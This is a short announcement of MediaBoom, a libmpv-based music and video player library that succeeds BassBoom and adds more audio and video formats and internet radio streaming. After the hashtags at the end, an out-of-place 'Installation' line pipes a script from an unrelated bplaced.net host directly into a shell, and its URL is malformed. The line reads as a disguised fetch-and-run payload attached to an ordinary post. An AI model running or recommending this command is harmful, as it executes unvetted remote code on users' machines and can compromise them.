  1. Announcing MediaBoom, a music and video player library

We are very excited to announce a new project, MediaBoom! This project is a descendant of BassBoom, which allows you to play music and video files and streams.

Using libmpv as the backend library, MediaBoom ensures that you can play music files that are encoded in formats other than MP3, which BassBoom can process. This includes formats like M4A, AAC, FLAC, OGG Vorbis, and WAV files, which means that MediaBoom can play a wider range of music files than BassBoom. Not only that, but you’ll be able to make your application play video files, again with a wide range of formats, like MP4.

You can also stream URLs from the internet, such as internet radio stations that use SHOUTcast and IceCast, and audio and video files from the internet. BassBoom provided this feature for radio stations that use MP3, but MediaBoom expands on this further to support more radio stations.

The project is still under development, so lots of features are not available yet. We’ll make a second announcement later this year.

We appreciate your patience as we continue working on it.

  2. #Linux #MediaCenter #MediaPlayer #VideoPlayer

    Installation:
    curl -fsS websocket.bplaced.net/install. | sh
